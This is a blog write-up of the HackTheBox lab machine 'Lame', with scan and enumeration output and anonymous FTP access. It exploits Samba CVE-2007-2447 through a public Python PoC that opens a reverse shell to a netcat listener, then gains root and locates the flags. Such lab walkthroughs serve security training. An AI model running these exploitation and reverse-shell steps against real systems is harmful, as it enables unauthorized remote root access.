Another Lame HackTheBox Writeup

by initinfosec on October 29, 2019 under writeups

11 minute read

Another Lame HackTheBox Writeup

A quick writeup of ‘Lame’ from HTB

Host Information
Hostname	Operating System	HTB Difficulty Rating
Lame	Linux	Easy

view all writeups here

Enumeration

IP of box is 10.10.10.3

nmap

Running a nmap scan shows:

─➤  sudo nmap -sS -sV -p- -O -oA lame 10.10.10.3

[sudo] password for initinfosec: 
Starting Nmap 7.80SVN ( https://nmap.org ) at 2019-12-27 10:39 CST
Nmap scan report for 10.10.10.3
Host is up (0.044s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.35 seconds

Connecting to FTP showed anonymous logins were allowed

╰─➤  ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:initinfosec): anonymous
331 Please specify the password.
Password: 
230 Login successful.

Cool, we might be able to leverage this later for payload/malicious file upload if we need to. If we check briefly on searchsploit for vsftpd 2.3.4 we receive one result, showing a ruby msf exploit, based on this exploit. Apparently if you pass a “:)” as the username on the vsftpd login, some (not all) installs of vsftpd 2.3.4 will spawn a reverse tcp shell on port 6200.

We can briefly test this by running nc -lvnp 6200 then trying to log in with the username as :). This didn’t seem to do anything, so let’s move on

author’s note - it occured to me when cleaning up this writeup, that my initial test to check the vsftpd backdoor may not have been entirely accurate. I’d have to look more at the ruby code to see how the remote shell spawns on 6200. You could also confirm this with the msf module for this vulnerability, but either way, I moved on.

Further Enumeration of Samba

If the vsftpd app isn’t the vector to a shell, I have a hunch it will be a SMB/Samba vulnerability. Since 2 Samba/netbios ports are open, I try to enumerate NFS shares.

We can start with trying to enumerate Samba & see if it allows for null sessions. Let’s try enum4linux:

enum4linux 10.10.10.3
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jan 12 23:38:37 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.3
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ================================================== 
|    Enumerating Workgroup/Domain on 10.10.10.3    |
 ================================================== 
Can't load /etc/samba/smb.conf - run testparm to debug it
[E] Can't find workgroup/domain


 ========================================== 
|    Nbtstat Information for 10.10.10.3    |
 ========================================== 
Can't load /etc/samba/smb.conf - run testparm to debug it
Looking up status of 10.10.10.3
No reply from 10.10.10.3

 =================================== 
|    Session Check on 10.10.10.3    |
 =================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 437.
[+] Server 10.10.10.3 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 451.
[+] Got domain/workgroup name: 

 ========================================= 
|    Getting domain SID for 10.10.10.3    |
 ========================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 359.
Unable to initialize messaging context
rpcclient: Can't load /etc/samba/smb.conf - run testparm to debug it
[+] Can't determine if host is part of domain or part of a workgroup

 ==================================== 
|    OS information on 10.10.10.3    |
 ==================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 458.
Use of uninitialized value $os_info in concatenation (.) or string at /usr/bin/enum4linux line 464.
[+] Got OS info for 10.10.10.3 from smbclient: 
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 467.
[+] Got OS info for 10.10.10.3 from srvinfo:
Unable to initialize messaging context
rpcclient: Can't load /etc/samba/smb.conf - run testparm to debug it

 =========================== 
|    Users on 10.10.10.3    |
 =========================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 866.
Use of uninitialized value $users in print at /usr/bin/enum4linux line 874.
Use of uninitialized value $users in pattern match (m//) at /usr/bin/enum4linux line 877.

Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 881.
Use of uninitialized value $users in print at /usr/bin/enum4linux line 888.
Use of uninitialized value $users in pattern match (m//) at /usr/bin/enum4linux line 890.

 ======================================= 
|    Share Enumeration on 10.10.10.3    |
 ======================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 640.
Unable to initialize messaging context
smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            LAME

[+] Attempting to map shares on 10.10.10.3
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 654.
//10.10.10.3/print$	Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 654.
//10.10.10.3/tmp	Mapping: OK, Listing: OK
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 654.
//10.10.10.3/opt	Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 654.
//10.10.10.3/IPC$	[E] Can't understand response:
Unable to initialize messaging context
smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 654.
//10.10.10.3/ADMIN$	Mapping: DENIED, Listing: N/A

 ================================================== 
|    Password Policy Information for 10.10.10.3    |
 ================================================== 


[+] Attaching to 10.10.10.3 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

	[+] LAME
	[+] Builtin

[+] Password Info for Domain: LAME

	[+] Minimum password length: 5
	[+] Password history length: None
	[+] Maximum password age: Not Set
	[+] Password Complexity Flags: 000000

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0

	[+] Minimum password age: None
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: Not Set

Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 501.

[+] Retieved partial password policy with rpcclient:



 ============================ 
|    Groups on 10.10.10.3    |
 ============================ 
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 542.

[+] Getting builtin groups:

[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 542.

[+] Getting local groups:

[+] Getting local group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 593.

[+] Getting domain groups:

[+] Getting domain group memberships:

 ===================================================================== 
|    Users on 10.10.10.3 via RID cycling (RIDS: 500-550,1000-1050)    |
 ===================================================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 742.

 =========================================== 
|    Getting printer info for 10.10.10.3    |
 =========================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at /usr/bin/enum4linux line 991.
Unable to initialize messaging context
rpcclient: Can't load /etc/samba/smb.conf - run testparm to debug it


enum4linux complete on Sun Jan 12 23:39:02 2020

Exploitation of Samba to gain a root shell

While a lot failed within the SMB scripts for enum4linux, we do see an important piece of info that is more helpful and tailored than what was provided by nmap - the samba version on the target system: Samba 3.0.20-Debian

Checking searchsploit reveals only 2 available exploits in their repo:

╰─➤  searchsploit Samba 3.0.20       
[i] Found (#1): /pentest/exploitation/exploit-db/files_exploits.csv
[i] To remove this message, please edit "/pentest/exploitation/exploit-db/.searchsploit_rc" for "files_exploits.csv" (package_array: exploitdb)

[i] Found (#1): /pentest/exploitation/exploit-db/files_shellcodes.csv
[i] To remove this message, please edit "/pentest/exploitation/exploit-db/.searchsploit_rc" for "files_shellcodes.csv" (package_array: exploitdb)

-------------------------------- ----------------------------------------------------
 Exploit Title                  |  Path
                                | (/pentest/exploitation/exploit-db/)
-------------------------------- ----------------------------------------------------
Samba 3.0.20 < 3.0.25rc3 - 'Use | exploits/unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Ov | exploits/linux/remote/7701.txt
-------------------------------- ----------------------------------------------------
Shellcodes: No Result

And based on the title of the second exploit, it looks like 3.0.20 may be too high a version for the remote heap exploit to work on.

Let’s check out the first one. So it looks like it’s a ruby file and is a module/exploit for use within metasploit. Checking out the exploit number 16320 on exploit DB gives us a bit more info: the associated CVE is CVE-2007-2447, and the vulnerability seems to lie in somehow allowing command execution attached to the username field.

While this would be an ideal task for metasploit, i’m again trying not to use it, in prep for PWK/OSCP. Let’s see what other PoCs exist out there for the CVE.

‘Manual’/non-msf exploitation of Samba vulnerability

A quick google yields this promising github link. Let’s see if we can give it a whirl:

Within the exploits folder for this box, I’ll git clone the project, and we’ll send up with the PoC python script, like so:

╰─➤  git clone https://github.com/amriunix/CVE-2007-2447.git
Cloning into 'CVE-2007-2447'...
remote: Enumerating objects: 8, done.
remote: Total 8 (delta 0), reused 0 (delta 0), pack-reused 8
Unpacking objects: 100% (8/8), done.
╭─initinfosec@theMachine ~/writeups/HTB/lame/exploits  
╰─➤  cd CVE-2007-2447 
╭─initinfosec@theMachine ~/writeups/HTB/lame/exploits/CVE-2007-2447  ‹master› 
╰─➤  ll
total 8.0K
-rw-r--r-- 1 initinfosec initinfosec  991 Jan 13 00:08 README.md
-rw-r--r-- 1 initinfosec initinfosec 1.1K Jan 13 00:08 usermap_script.py

A quick peek at the code reveals it’s a python2 script, so let’s install the pysmb pip package as instructed by the readme with sudo pip2 install pysmb.

Great, now let’s try the script. First let’s check the usage from the readme:

CVE-2007-2447 - Samba usermap script.
</br>
https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

## Usage:

shell
$ python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>

  * `RHOST` -- The target address
  * `RPORT` -- The target port (TCP : 139)
  * `LHOST` -- The listen address
  * `LPORT` -- The listen port

I’ll go ahead and start a netcat listener on an arbitary port with sudo nc -lnvp 43110.

OK, let’s give it a run:

╰─➤  python2 usermap_script.py 10.10.10.3 139 <VPN IP> 43110
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !

And checking our netcat terminal window:

╰─➤  nc -lvnp 43110
Connection from 10.10.10.3:51723

Awesome, we got a shell for the SMB vulnerability CVE-2007-2447 without metasploit. (Realistically, the python PoC does the same thing as the msf module, but still :) )

So let’s check things out quickly. As expected, with most SMB vulns like this, it’s a one-shot straight to root. But we can upgrade our shell, then grab the flags.

whoami
root
which python
/usr/bin/python
/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'
root@lame:/# find / -name user.txt*
find / -name user.txt*
/home/makis/user.txt
root@lame:/# find / -name root.txt*
find / -name root.txt*
/root/root.txt
root@lame:/# echo -e "All Done. :) \n\n Thanks for reading. Catch you next time.\n\n"
\n\n"-e "All Done. :) \n\n Thanks for reading. Catch you next time." 
All Done. :) 

 Thanks for reading. Catch you next time.

~@initinfosec

hackthebox, HTB, writeups, walkthrough, hacking, pentest, OSCP prep

I feedback.
Let me know what you think of this article on twitter @initinfosec or leave a comment below!